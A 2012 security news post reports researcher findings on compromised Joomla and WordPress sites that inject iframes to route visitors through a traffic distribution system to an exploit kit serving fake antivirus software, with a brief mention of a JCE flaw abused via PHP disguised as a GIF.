Multiple Joomla Sites Serving Malware

By Wednesday, December 12, 2012 0 , , Permalink 0

According to Internet Storm Center, Joomla and WordPress sites are targeted and malicious iFrames are being hosted. The ISC notes that servers hosting such sites are not being targeted through any specific vulnerability but, some kind of tool is being used to fire a bunch of exploits with a hope that something hits the bull’s-eye. 

“…it doesn’t seem to be a scanner exploiting one vulnerability but some tool that’s basically firing a bunch of Joomla and WordPress exploits at a given server and hoping something hits”, states ISC.

Once exploited these servers are in turn infecting users’ systems with fake AV software through the use of an exploit kit. The URLs ending with /nighttrend.cgi?8 as noted by ISC, have been known to serve such malware. A couple of IP addresses and have been also identified as culprits as of now.

Use if traffic distribution system has also been noticed whereby iframes are being redirected to IPs hosting the exploit kit through the Sutra Traffic Distribution System. Symantec wrote about such attacks back in 2011 whereby it noted that even though TDS was an old concept, such systems are being increasingly used to not only buy and sell web traffic but, also deliver exploits.

Thomas Hungenberg of CERT-Bund, through his analysis, believes that some kind of automated script may have been used exploit vulnerabilities in Joomla Content Editor (JCE). The description on the forum notes that the once the vulnerable server is exploited, PHP injection is carried out by masquerading as a GIF file. The attacker can call this remotely and further inject malicious iframes into JavaScript files on a regular basis notes The H.